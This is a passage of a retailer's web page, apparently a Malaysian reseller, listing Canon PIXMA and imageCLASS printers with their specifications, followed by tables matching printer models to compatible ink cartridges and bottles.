Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><p>[maxbutton id=\"11\" ]</p>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Laser Printers :-</h3>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<h4>Compact with wireless connectivity</h4><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 28ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 5.2 sec</li><li>Max. paper input capacity: 251 sheets</li><li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact All-in-One with wireless connectivity</strong></p><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.</p><ul><li>Print, Scan, Copy</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>FPOT: Approx. 6.5 sec</li><li>Max. paper input capacity: Up to 150 sheets</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Printing</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 43ppm</li><li>Recommended monthly print volume: 2,000 - 7,500 pages</li><li>FPOT: 6.2secs. (A4)</li><li>Max. paper input capacity: Up to 2,300 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.</p><ul><li>Print, Scan, Copy, Fax</li><li>Print Speed (A4): Up to 38ppm</li><li>Recommended monthly print volume: 750 - 4,000 pages</li><li>FPOT: 5.5secs. (A4)</li><li>Max. paper input capacity: Up to 900 sheets</li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li></ul><p>[maxbutton id=\"11\" ]</p>		\n			<h3>Cartridge Printers :-</h3>		\n		<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>imagePROGRAF PRO-500</p></td><td width=\"208\"><p>Maintenance Cartridge MC-20</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PFI-50 (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY iB4170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5070</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5170</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5370</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>MAXIFY MB5470</p></td><td width=\"208\"><p>PGI-2700 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-2700XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA E3170</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E410</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 